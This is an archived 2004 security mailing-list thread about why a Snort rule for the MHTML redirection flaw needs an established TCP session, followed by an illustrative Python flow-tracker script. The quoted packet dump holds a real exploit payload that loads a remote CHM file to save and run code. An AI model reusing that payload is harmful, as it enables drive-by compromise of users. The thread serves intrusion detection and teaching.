[Intrusions] mhtml signature

Joshua Berry jberry at PENSON.COM
Wed Aug 4 17:06:53 GMT 2004


This is a TCP based connection and that is why the signature looks for
an established connection.  This helps to reduce false positives and
also protects against attacks from scripts like Snot that do not
actually complete the 3-way handshake.  This attack will only succeed if
the 3-way handshake is completed because data cannot be transferred
until that point.

-----Original Message-----
From: intrusions-bounces at lists.sans.org
[mailto:intrusions-bounces at lists.sans.org] On Behalf Of lola marais
Sent: Wednesday, August 04, 2004 7:18 AM
To: intrusions at lists.sans.org
Subject: [Intrusions] mhtml signature

I have been working on a problem and require the assistance of the broader list community.
Credit is given to the owner of this signature at 
http://sourceforge.net/mailarchive/message.php?msg_id=7758516


I am planning on using this signature for a detect in part 2 of my GCIA practical.

The problem is that I am not able to get it working 100% with the data that I have. By not working I mean that it will miss the single packet that I have captured.

I have captured some data from a network using tcpdump. The capture contains the data content required to trigger the event. The capture contains a single packet for that session, no more.

When I read the data past snort with the signature enabled, then NO alerts are triggered. If I remove the part of the signature "flow:from_server,established" and then pass the same data I have 1 event.

The signature looks for an established connection.
My question is:

1. Why has the author of the signature decided to look for an established connection?
2. Does the signature stand a chance of missing some events by looking only for established connections?

The current version of the signature has the following structure.

alert tcp any any -> $HOME_NET any (msg:"Microsoft MTHML URL Redirection Attempt"; flow:from_server,established; content:"mhtml|3A|file|3A|"; nocase; reference:cve,CAN-2004-0380; reference:url,www.microsoft.com/technet/security/.../MS04-013.mspx; classtype:web-application-attack; rev:2;)

The data packet that I have captured looks as follows:

07/28/04-11:23:51.262652 MAC:removed -> MAC:removed type:0x800 len:0xC2
Proxy:ProxyPort -> InternalHost:4003 TCP TTL:63 TOS:0x0 ID:33030 IpLen:20 DgmLen:176 DF
***AP**F Seq: 0xDC274ADF  Ack: 0x2B3B3965  Win: 0xC1E8  TcpLen: 20
0x0000: 00 0A 42 42 80 0A 00 03 32 87 9A 71 08 00 45 00  ..BB....2..q..E.
0x0010: 00 B0 81 06 40 00 3F 06 2B 92 9E A9 83 0D 9E A6  ....@.?.+.......
0x0020: CE 52 1F 4C 0F A3 DC 27 4A DF 2B 3B 39 65 50 19  .R.L...'J.+;9eP.
0x0030: C1 E8 70 F3 00 00 20 20 20 20 3C 6F 62 6A 65 63  ..p...    <objec
0x0040: 74 20 64 61 74 61 3D 22 26 23 31 30 39 3B 73 2D  t data="&#109;s-
0x0050: 69 74 73 3A 6D 68 74 6D 6C 3A 66 69 6C 65 3A 2F  its:mhtml:file:/
0x0060: 2F 43 3A 5C 66 6F 6F 2E 6D 68 74 21 68 74 74 70  /C:\foo.mht!http
0x0070: 3A 2F 2F 77 77 77 2E 66 72 65 65 33 32 2E 63 6F  ://www.free32.co
0x0080: 6D 2F 50 4F 50 2E 43 48 4D 3A 3A 2F 73 61 76 65  m/POP.CHM::/save
0x0090: 61 6E 64 72 75 6E 2E 68 74 6D 22 20 74 79 70 65  andrun.htm" type
0x00A0: 3D 22 74 65 78 74 2F 78 2D 73 63 72 69 70 74 6C  ="text/x-scriptl
0x00B0: 65 74 22 3E 3C 2F 6F 62 6A 65 63 74 3E 20 D1 7F  et"></object> ..
0x00C0: CA 27                                            .'

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
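The behaviour the reply describes, as an added example that is not part of this thread and is not Snort's code: the script re-parses the hex dump quoted above, decodes the Ethernet/IPv4/TCP headers, and runs a toy stream tracker in which a flow counts as established only after SYN, SYN/ACK and ACK have all been seen. The FlowTracker class, the count_alerts function and the synthetic_handshake packets (with placeholder sequence numbers) are assumptions made for the illustration; Snort's real stream preprocessor is far more elaborate, and only the handshake requirement is modelled here.

```python
"""Why "flow:from_server,established" misses a packet captured mid-session.

Added example, not code from the list posters or from Snort. Only the
three-way-handshake requirement of a stream tracker is modelled.
"""
import struct
from collections import namedtuple

# The packet quoted in the post, hex column only (194 bytes, len:0xC2).
HEX_DUMP = """
0x0000: 00 0A 42 42 80 0A 00 03 32 87 9A 71 08 00 45 00
0x0010: 00 B0 81 06 40 00 3F 06 2B 92 9E A9 83 0D 9E A6
0x0020: CE 52 1F 4C 0F A3 DC 27 4A DF 2B 3B 39 65 50 19
0x0030: C1 E8 70 F3 00 00 20 20 20 20 3C 6F 62 6A 65 63
0x0040: 74 20 64 61 74 61 3D 22 26 23 31 30 39 3B 73 2D
0x0050: 69 74 73 3A 6D 68 74 6D 6C 3A 66 69 6C 65 3A 2F
0x0060: 2F 43 3A 5C 66 6F 6F 2E 6D 68 74 21 68 74 74 70
0x0070: 3A 2F 2F 77 77 77 2E 66 72 65 65 33 32 2E 63 6F
0x0080: 6D 2F 50 4F 50 2E 43 48 4D 3A 3A 2F 73 61 76 65
0x0090: 61 6E 64 72 75 6E 2E 68 74 6D 22 20 74 79 70 65
0x00A0: 3D 22 74 65 78 74 2F 78 2D 73 63 72 69 70 74 6C
0x00B0: 65 74 22 3E 3C 2F 6F 62 6A 65 63 74 3E 20 D1 7F
0x00C0: CA 27
"""

FIN, SYN, PSH, ACK = 0x01, 0x02, 0x08, 0x10
RULE_CONTENT = b"mhtml:file:"   # content:"mhtml|3A|file|3A|"; nocase

Packet = namedtuple("Packet", "src sport dst dport seq ack flags payload")


def parse_hex_dump(text):
    """Turn 'offset: xx xx ...' lines back into the raw frame bytes."""
    raw = bytearray()
    for line in text.strip().splitlines():
        _, _, body = line.partition(":")
        raw += bytes.fromhex(body.replace(" ", ""))
    return bytes(raw)


def decode_frame(frame):
    """Decode Ethernet II / IPv4 / TCP; return header fields plus TCP payload."""
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    ip = ip[:total_len]   # the 4 bytes past DgmLen are an Ethernet trailer, not data
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:]
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    doff = (off_flags >> 12) * 4
    return Packet(src, sport, dst, dport, seq, ack, off_flags & 0x1FF, tcp[doff:])


class FlowTracker:
    """Toy stream tracker (assumption): 'established' only after a full handshake."""

    def __init__(self):
        self.flows = {}   # (client_ip, client_port, server_ip, server_port) -> state

    def observe(self, pkt):
        """Update state; return (direction, established) for this packet."""
        as_client = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        as_server = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if pkt.flags & SYN and not pkt.flags & ACK:       # client opens the flow
            self.flows[as_client] = "SYN"
            return "from_client", False
        if as_server in self.flows:                       # sent by the server side
            if self.flows[as_server] == "SYN" and pkt.flags & SYN:
                self.flows[as_server] = "SYNACK"
            return "from_server", self.flows[as_server] == "EST"
        if as_client in self.flows:                       # sent by the client side
            if self.flows[as_client] == "SYNACK" and pkt.flags & ACK:
                self.flows[as_client] = "EST"
            return "from_client", self.flows[as_client] == "EST"
        return None, False   # no handshake seen: mid-stream packet, direction unknown


def count_alerts(packets, require_established=True):
    """Alerts the rule raises over the sequence, with or without the flow test."""
    tracker, alerts = FlowTracker(), 0
    for pkt in packets:
        direction, established = tracker.observe(pkt)
        if RULE_CONTENT not in pkt.payload.lower():       # nocase content match
            continue
        if not require_established or (established and direction == "from_server"):
            alerts += 1
    return alerts


def synthetic_handshake(pkt):
    """Constructed SYN, SYN/ACK, ACK the capture would hold had it started earlier.
    The internal host (pkt.dst) is the client, the proxy (pkt.src) the server;
    sequence numbers are placeholders, the toy tracker does not check them."""
    c_ip, c_port, s_ip, s_port = pkt.dst, pkt.dport, pkt.src, pkt.sport
    return [
        Packet(c_ip, c_port, s_ip, s_port, 0, 0, SYN, b""),
        Packet(s_ip, s_port, c_ip, c_port, 0, 1, SYN | ACK, b""),
        Packet(c_ip, c_port, s_ip, s_port, 1, 1, ACK, b""),
    ]


if __name__ == "__main__":
    pkt = decode_frame(parse_hex_dump(HEX_DUMP))
    print(f"{pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport} flags=0x{pkt.flags:02x} "
          f"(FIN/PSH/ACK) payload={len(pkt.payload)} bytes")
    print("lone packet, rule as written:       ", count_alerts([pkt]))
    print("lone packet, flow test removed:     ", count_alerts([pkt], False))
    print("handshake + packet, rule as written:", count_alerts(synthetic_handshake(pkt) + [pkt]))
```

The decoded header confirms what the Snort print shows: a single FIN/PSH/ACK segment from the proxy, with no SYN or SYN/ACK anywhere in the file, so a tracker that insists on the handshake never marks the session established and the rule stays silent; the same packet alerts once the flow test is removed or a handshake precedes it. The practical fix is to start the capture before the session opens; dropping the flow test trades that requirement for the false positives and unacknowledged-packet noise the reply mentions. Whether Snort picks up sessions seen mid-stream depends on its stream preprocessor configuration, so the behaviour should be checked against the deployed version.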
